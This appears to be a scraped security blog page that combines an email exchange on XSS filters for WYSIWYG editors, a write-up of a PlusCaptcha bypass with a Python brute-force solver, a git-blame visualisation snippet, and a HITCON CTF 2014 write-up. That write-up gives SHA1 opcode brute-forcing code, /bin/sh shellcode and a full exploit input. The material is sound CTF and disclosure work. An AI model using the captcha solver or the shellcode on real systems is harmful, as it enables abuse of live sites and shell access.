The demo is not a final solution for WYSIWYG editors. It is just one potential solution that developers may use (use this on server-side).

Now discuss second potential solution (not a complete) but bits and pieces can be used by the WYSIWYG editors' developers. As an academia, we proposed different prototype solutions ... you also know that.

In a recent work, I had developed a per-context server-side filter or encoder which is based on minimalistic encoding of meta or trigger characters. It is a complete solution for an XSS protection in five contexts and I achieved the results with only 11 characters and 3 regular expressions in total. It supports five contexts, HTML, attribute, style, URL and script. I had developed the solution by keeping in mind XSS not WYSIWYG editors ...

But by keeping in mind WYSIWYG editor's functionality, as a developer one can leverage the code from three contexts that are also part of most WYSIWYG editors ...

  • attribute
  • style
  • URL

If you are a WYSIWYG editor developer and wants to allow users of WYSIWYG editors to set some attributes like id, class then you can use a function proposed attributeContextCleaner (see

In a similar manner, if you want to allow styling then you can use styleContextCleaner. Fabian had written that it encodes everything ... No. It only controls six characters that are necessary to execute JavaScript in style context. At the same time, it allows simple styling which I assume WYSIWYG editors want to offer (see One can also cut short six control characters into five characters if you know that you will be only using double quotes through-out your code then no need to control single quote in style context and vice-versa. Can be further shorten to four characters if you as a developer are sure that you will be using only style attribute not style tag then remove < from the list ...

For URL, if you are a WYSIWYG editor developer then I had written 3 regular expressions that only allow harmless URLs and do not allow JavaScript, Data and VbScript URI. I had discussed one out of three regular expression here: The other two regular expressions deals with mailto: and relative URI etc.

Because script context is not part of WYSIWYG editor's functionality and that's why I omitted scriptContextCleaner from the slides.

The challenge related to these 11 characters plus 3 regular expression is still online and so far 82K XSS attack attempts failed ... I had shown the logs in the presentation at Black Hat.

Take away for this second solution:

"No matter how you will code your WYSIWYG editor but if your WYSIWYG editor supports above three contexts then YOU MAY LEVERAGE MY CODE WHICH IS UNBREAKABLE and perfectly suites/fits (at least I think) in three contexts ..." My assumption is that even if they have some sort of sanitization then it may be flawed. Mine functions are thoroughly tested by the community and so far flawless ... (no one is able to XSSed these). They can use my functions as a replacement only for their sanitization routines ...

I hope it helps.

After this initial exchange .mario asks a few specific questions:

a) You say your filter is flawless and ready for deployment against XSS?
  • From: sanitization then it may be flawed. Mine functions are thoroughly tested by the community and so far flawless ... (no one is able to XSSed

So far flawless. But I can not guarantee about the future ... As far as deployment is concerned, it has already been deployed as an extension for Symphonycms: There are other products also. Once paper (under submission) will be accepted, all names will be public.

b) You say that if no server side validation is being used, the client side validation/sanitation will help?
  • From: [...] that developers of WYSIWYG editors want server-side sanitization while developers of server-side web applications take the product and start using it without adding sanitization stuff which makes the sites vulnerable.

Yes & No. It is debatable....

c) Existing XSS filters commonly introduce false alerts
  • From: (which is a common problem in filtering solutions)

Yes. see this also: This paper discussed NoScript's false positives ...

d) Given you referenced the way academia works: Do you consider your work to be novel? You mentioned a proposed solution. Are you the first proposing this? I am asking these questions to get an understanding of what you mean and what the background of the presentation and publication is.

I see novelty ...

1) You were the first in literature who proposed a particular type of solution

2) Improvement over existing work ...

My proposed sanitization solution lies in (2) because there are already solutions like OWASP Java Encoder but mine solution is improved in a manner because I did the job with far less number of characters ...

The black hat talk is related to the case study of looking at XSSes in WYSIWYG editors.

e) Do you mind if we publish your replies in our article?

You can post my replies given not tweaked.


Posted on Tue 14 October 2014 in posts • Tagged with script, python, captcha, securityLeave a comment

First of all, this research is legit because I have a logo and a name for it. This seems to be a trend right now (heartbleed, shellshock, sandworm) . Afaik the rule is that you must invest the same time into creating the logo as you did in your research.

Creating a captcha system is not as easy as it seems. Presumably your captcha system doesn't have any implementation errors and logic flaws, you are still fighting against andvanced research in image/voice recognition. That's almost like creating your own crypto.

But if you have expected some crazy new algorithm, I have to dissapoint you. It's just another design flaw.

crossed captcha logo

So this post is about yet another broken captcha, and if you are not interested in the technical part, just make sure you remember this:

I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.
I promise I will never make my own captcha system.

But let's not beat around the bush for too long. You are reading this because you are interested in what this scary CrossedCaptcha is all about, right?

The captcha system I'm talking about is called PlusCaptcha, which you can use as a standalone script or Wordpress Plugin. For some reason it's even ecological!

pluscaptcha ecology

How did I come up with CrossedCaptcha? Well, a plus (+) and a cross (✝) are very similar. I know that crossed isn't technically crucified, and it makes it less funny, but whatever. You are here because you are interested in the exact vulnerability and you want to know how it's done. And you have read enough technical blah blah articles anyway.

So let's dive in...

This is how the PlusCaptcha looks like. You have to turn the circle to match the background image.


It's an embedded iframe with the url This particular instance has the id 42906365. Everytime this URL is loaded, there will be a new captcha with a different solution be generated.

When you adjust the circle, the iframe will send a POST request to with data grados=-90&iduso=%d&size=c&green=0, where grados is the degree of the turned picture. It does this for every adjustment you make.

The following code is the php backend check if the captcha you have entered is correct. It does this by checking

$host = ''
$resultado_ejecucion = @fgets(@fopen('http://'.$host.'/r?iduso='.$datosent[0]. '', 'r'), 4096);
// Acertar si acertó con el captcha | engl.: Hit if hit with captcha
if($resultado_ejecucion) {
    return true;
    return false;

Now you would expect, that once you asked the server if the captcha you previously entred was correct, it would void this particular captcha.

But it doesn't.

So you can just "adjust the circle" and ask if it was correct until you found the correct position and then submit your form.

A bit of testing has also shown that you have a tollerance from around 50-70 degree:

degree 148-219 are correct (70 degree tollerance)
degree  98-169 are correct (70 degree tollerance)
degree 177-226 are correct (50 degree tollerance)
degree 255-304 are correct (50 degree tollerance)

So you only have to test a handfull of numbers to crack the captcha:

import urllib2
def solve(iduso):
    for i in range(0, 360, 50):
                        "grados=-%d&iduso=%d&size=c&green=0" % (i,iduso)).read()
        if urllib2.urlopen("" % iduso).read() == '1':
            return i
    return 'fail'
print solve(42906365)

A simple solution would be to void the captcha after the server has checked it once. But then you still have a ~14%-20% chance on beeing correct just by guessing. And because you only have a limited amount of pictures you can easily presolve them anyway. Besides that, this implementation is also not barrier free.

If I had to suggest a captcha solution, then it would be reCaptcha...

Code Archeology (Updated)

Posted on Thu 18 September 2014 in posts • Tagged with script, python, code auditLeave a comment

One day I thought about different techniques to do source code analysis. Especially since we often have access to repositories and thus the evolution of code.

Wouldn't it be cool to see the age of certain lines of code relatively to others? So I decided to create a PoC Sublime Text Plugin to visualize the age of lines. I call this method - Code Archeology

And here is the result. This is the normal syntax highlighting:

code archeology normal

And this is an example which highlights the oldest parts of the code and darkens the newer lines:

code archeology visualized

Update 2014-09-24:

So it turns out that somebody already thought about Code Archeology long before me - John Firebaugh - Code Archaeology With Git. Maybe I have even read this article years ago, forgot about it, and subconsciously "created" it in my head again.

And it gets worse. Github already has colors to indicate older and newer files.

GitHub Blame Color Encoding

But github has only 10 different colors and the narrow coloumn doesn't really transmit the information. So to finally do something "useful" I have created a small JavaScript snippet, which you can copy into the developer console.

It parses the <time> tag of each commit and assigns colors to each line. It also removes some of the commit info to have a bigger view on the code.

GitHub Blame Color PoC


var color_range=205;nextSibling=function(e){if(e){e=e.nextSibling;while(e&&e.nodeType!=1){e=e.nextSibling}return e}};var all_lines=[];$.each($(".blame-commit time"),function(e,t){var n=new Date(t.getAttribute("datetime"));var r=t.parentNode.parentNode.parentNode;var i=r.getAttribute("rowspan")-1;var s=Array();var o=nextSibling(r.parentNode);while(o&&i>0){i--;s.push(o);o=nextSibling(o)}all_lines.push({datetime:n,lines:s})});all_lines.sort(function(e,t){return t.datetime-e.datetime});var bucket_size=all_lines.length/color_range;$.each(all_lines,function(e,t){col=Math.floor(e/bucket_size+(255-color_range)/2);$.each(t.lines,function(e,t){"rgb("+col+","+col+","+col+")"})});$(".commit-info img").remove();$(".commit-body").remove();$(".commit-info").css({width:"70px","min-width":"70px"})

You can stop reading here, or continue if you are interested in my original crappy Sublime Text Plugin solution...

I don't really know if it will be usefull in the future. But it's already fun to look over code. Here for example two excerpts from OpenSSL's t1_lib.c.

Here you can see how over time more and more else ifs got added. Remember - the lighter the color, the older the code.

code archeology visualized

And here you can see that a comment was written very early, while the code changed.

code archeology old_comment

How it works

At first I created a small test repository with a simple file and a few changes. With git blame --line-porcelain -w <file> you can get the commit of each line, which then can be parsed by a python.

e04094852bd6b19b7c7fc0b4651d7299d3bb004e 1 1 3
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c
    #include <stdio.h>
e04094852bd6b19b7c7fc0b4651d7299d3bb004e 2 2
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c
    #define MAX_NAME 50
e04094852bd6b19b7c7fc0b4651d7299d3bb004e 3 3
author samuirai
author-time 1404753962
author-tz +0200
committer samuirai
committer-time 1404753962
committer-tz +0200
summary added MAX_NAME and missing #include
previous 5643cc394796389ed698ba17603da208466b06f0 test.c
filename test.c

e60aa7d9ece183db73d5728e6f5c8ebd6a9f2261 4 4 1
author samuirai
author-time 1404754156
author-tz +0200
committer samuirai
committer-time 1404754156
committer-tz +0200
summary fixed argc spelling error
previous 7cb68460a085d9535d9d27746ec9879180796b54 test.c
filename test.c
    int main(int argc, char **argv) 

Now I need to group them together and assign them a color. Unfortunately this get's really ugly in Sublime :( To create a colored line I have to generate a theme on-the-fly with different colored regions and assign them to corresponding age groups afterwards:


Then I have to go through all my lines with Sublime views and add the corresponding region to it.

There are quite a few cons about my method. First of all you can only look at one file at a time. Because the theme is always on-the-fly generated based on the amount of groups I have, it will change the look of other open files that share the same dynamic theme. The generation is also slow - a file with ~5k LOC takes over 10 seconds.

I think that visualizing the age of code can be very useful, but somebody has to come up with a better idea how to implement it.

The PoC plugin can be downloaded here Place the script in ~/Library/Application Support/Sublime Text 3/Packages/User. Then open a file in a git repository and press ctrl+` to open the console and run it with view.run_command("example") or to reset the view use view.run_command("example", {'reset': True}). But this should never ever ever be used by anybody. It's buggy and will probably only work on my machine. I just don't want to hold back any information.

HITCON CTF 2014 - sha1lcode

Posted on Mon 18 August 2014 in posts • Tagged with ctf, hitconctf2014Leave a comment


The name of the challange sha1lcode already hints on the overall idea - writing shellcode that has something todo with sha1 hashes.

So let's have a first look at the provided binary file:

$ file sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe
sha1lcode-5b43cc13b0fb249726e0ae175dbef3fe: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

The following call tree image is generated with Hopper

sha1lcode calltree

Hopper can also generate some pseudo C code, which I have cleaned up a little bit and renamed variables:

    function main {
        read(0x0, &input_size, 0x4);
        if (input_size > 0x3e8) {
                rax = exit(0x0);
        else {
                i = 0x0;
                while (input_size*16 > i) {
                        anz_chrs = read(0x0, input_data+i, (input_size*16)-i);
                        i = anz_chrs+i;
                j = 0x0;
                while (j < input_size) {
                         SHA1((j*16) + input_data, 0x10, (j*8 + j*8) + code);
                        j = j + 0x1;
                memset(input_data, 0xffffffff, 0x3e80);
                rax = (code)();
                return 0x0;
        return rax;

At the start of the function you can see a read() of 4 bytes and a first check afterwards, which would exit the application if you enter 4 bytes bigger than 0x3e8. If this is check is passed, the entered value input_size is used in the while loop to read() more data into input_data. After this loop is completed, input_data is hashed in 16 byte chunks with SHA1() and written into code. At the end the original input_data is overwritten with 0xffffffff and the program jumps to the code data.

So the data we input in the loop, gets hashed in 16 byte chunks with SHA1 and then we jump to those hashes. Now it's clear what we have to do - we have to generate SHA1 hashes with valid x86-64 opcodes.

This is a bit of crappy C code to bruteforce hashes with specific values.

#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>

void gen_random(char *s, const int len) {
    static const char alphanum[] =

    for (int i = 0; i < len; ++i) {
        s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];

    s[len] = 0;

int main()
    int max = 32; // generate max. 32 hashes with the searched values
    unsigned char ibuf[20];
    unsigned char obuf[20];
    for(;;) {
        // get a random string
        gen_random(ibuf, 0x10);

        // hash the random string
        SHA1(ibuf, 0x10, obuf);

        check if we got a hash with the opcode(s) we want.
        if(obuf[17]==0x48 && obuf[18]==0x09 && obuf[19]==0xcb ) {
        if(obuf[18]==0xb1 && obuf[19]==0x96 ) {
        if(obuf[0]==0xeb && obuf[1]==35 ) {
        if(obuf[0]==0x31 && obuf[1]==0xc0 ) {
            printf("%s sha1(",ibuf);
            for(int i = 0; i < 20; i++) {
                printf("%02x", obuf[i]);
            return 0;
    return 0;

Now that we have a little tool to generate hashes with opcodes we have to come up with a general idea to fit the shellcode into the hashes:

sha1lcode opcodes

The program jumps to the start of the first hash and there will be a jump to the end of the 2nd hash. At the end of the 2nd hash starts the shellcode with the first instruction(s). The beginning of the hash afterwards will be another jump the the end of the hash after that.

So generally we have in the beginning of one hash a jump to the end of the next hash, which will contain one or more shellcode opcodes. This way we can execute anything we want...

And this is the shellcode I used:

xor eax, eax
mov rbx, 0xFF978CD091969DD1
neg rbx
push rbx
;mov rdi, rsp
push rsp
pop rdi
push rdx
push rdi
;mov rsi, rsp
push rsp
pop rsi
mov al, 0x3b

The only problem is the length of the opcode. It was fairly fast to bruteforce up to three bytes. But I had to get the long string /bin/sh into the 64bit register and the 10 byte opcode is too long to bruteforce.

48BBD19D9691D08C97FF: mov rbx, 0xff978cd091969dd1

So I had to split this up in smaller opcodes:

mov   bl, 0x97
mov   bh, 0xff
shl  ebx, 0x10
mov   bh, 0x8c
mov   bl, 0xd0
shl  rbx, 0x20
mov   ch, 0x91
mov   cl, 0x96
shl  ecx, 0x10
mov   cl, 0xd1
mov   ch, 0x9d

Which is almost perfect, but the shl in rbx still need 4 bytes:

48C1E310: shl rbx, 0x10

But because 3 bytes can be bruteforced easily and the jmp only needs 2 bytes, we can bruteforce 3 bytes at the end of the one hash, and 3 bytes at the beginning fo the next hash to match opcode (4 bytes) + jump (2 bytes) = 6 bytes

In the end we can split up the shellcode like this:

  original text         opcode in the sha1 hash
ikLEsXBe58oJIuFL : (start) jmp 2
CYOEsiM5zOvynLcZ :   (end) xor eax, eax
EI6Tlq7y76Vh5hyN : (start) jmp 2
S61SFzdOBn3zyrBf :   (end) mov bl, 0x97
EI6Tlq7y76Vh5hyN : (start) jmp 2
zihgN1OfifVotOPs :   (end) mov bh, 0xff
qzg3NxCyYGweMVIr : (start) jmp 3
czbdI1dngWv4nbYv :   (end) shl EBX
EI6Tlq7y76Vh5hyN : (start) jmp 2
UqZhIrIoQrZu29qM :   (end) mov bh
EI6Tlq7y76Vh5hyN : (start) jmp 2
gMq4RKcD34SOoMpk :   (end) mov bl
qzg3NxCyYGweMVIr : (start) jmp 3
j90mqufCQHUY7DFI :   (end) part shl
BkrI3NqemVnl6iq2 : (start) part shl and jmp 2
l05Y1tnrwjQGa9GB :   (end) mov ch, 0x91
EI6Tlq7y76Vh5hyN : (start) jmp 2
mqKoGcLyK8fi3kSH :   (end) mov cl, 0x96
qzg3NxCyYGweMVIr : (start) jmp 3
hVoED3xi4I5kTghS :   (end) shl ECX
EI6Tlq7y76Vh5hyN : (start) jmp 2
70hQz3yujDwrWyEi :   (end) mov cl, 0xd1
EI6Tlq7y76Vh5hyN : (start) jmp 2
JcGdue7SlbVZ2lpg :   (end) mov ch, 0x9d
qzg3NxCyYGweMVIr : (start) jmp 3
XJodA3GFNyfC5mp1 :   (end) or rbx, rcx
qzg3NxCyYGweMVIr : (start) jmp 3
CzoXGfRlsiDKfS4H :   (end) neg rbx
qzg3NxCyYGweMVIr : (start) jmp 3
fgnxUdbfK3yemOIH :   (end) push rbx, push rsp, pop rdi
qzg3NxCyYGweMVIr : (start) jmp 3
taglR8DRWWJmg8Ss :   (end) cdq, push rdx, push rdi
EI6Tlq7y76Vh5hyN : (start) jmp 2
ygX8lQIoZ4Ln5EjX :   (end) push rsp, pop rsi
EI6Tlq7y76Vh5hyN : (start) jmp 2
9tyObcwpkagTLtEh :   (end) mov al, 0x3b
EI6Tlq7y76Vh5hyN : (start) jmp 2
JtZj2STVLXTitmQD :   (end) syscall

The number behind jmp 2/3 means if it will jump to 2 or 3 bytes before the end of the next hash. Because jumps are done relatively and not absolute it is always the same hash. qzg3NxCyYGweMVIr == jump to the last 3 bytes of the next hash and EI6Tlq7y76Vh5hyN == jump to the last 2 bytes of the next hash.

Now we can put the full string together, with \x3a\x00\x00\x00 as prefix to pass the first check, followed by the 16 byte chunks for the sha1 hashes:

echo "\x3a\x00\x00\x00ikLEsXBe58oJIuFLCYOEsiM5zOvynLcZEI6Tlq7y76Vh5hyNS61SFzdOBn3zyrBfEI6Tlq7y76Vh5hyNzihgN1OfifVotOPsqzg3NxCyYGweMVIrczbdI1dngWv4nbYvEI6Tlq7y76Vh5hyNUqZhIrIoQrZu29qMEI6Tlq7y76Vh5hyNgMq4RKcD34SOoMpkqzg3NxCyYGweMVIrj90mqufCQHUY7DFIBkrI3NqemVnl6iq2l05Y1tnrwjQGa9GBEI6Tlq7y76Vh5hyNmqKoGcLyK8fi3kSHqzg3NxCyYGweMVIrhVoED3xi4I5kTghSEI6Tlq7y76Vh5hyN70hQz3yujDwrWyEiEI6Tlq7y76Vh5hyNJcGdue7SlbVZ2lpgqzg3NxCyYGweMVIrXJodA3GFNyfC5mp1qzg3NxCyYGweMVIrCzoXGfRlsiDKfS4Hqzg3NxCyYGweMVIrfgnxUdbfK3yemOIHqzg3NxCyYGweMVIrtaglR8DRWWJmg8SsEI6Tlq7y76Vh5hyNygX8lQIoZ4Ln5EjXEI6Tlq7y76Vh5hyN9tyObcwpkagTLtEhEI6Tlq7y76Vh5hyNJtZj2STVLXTitmQD`python -c 'print \"A\"*0x3e8'`" > asd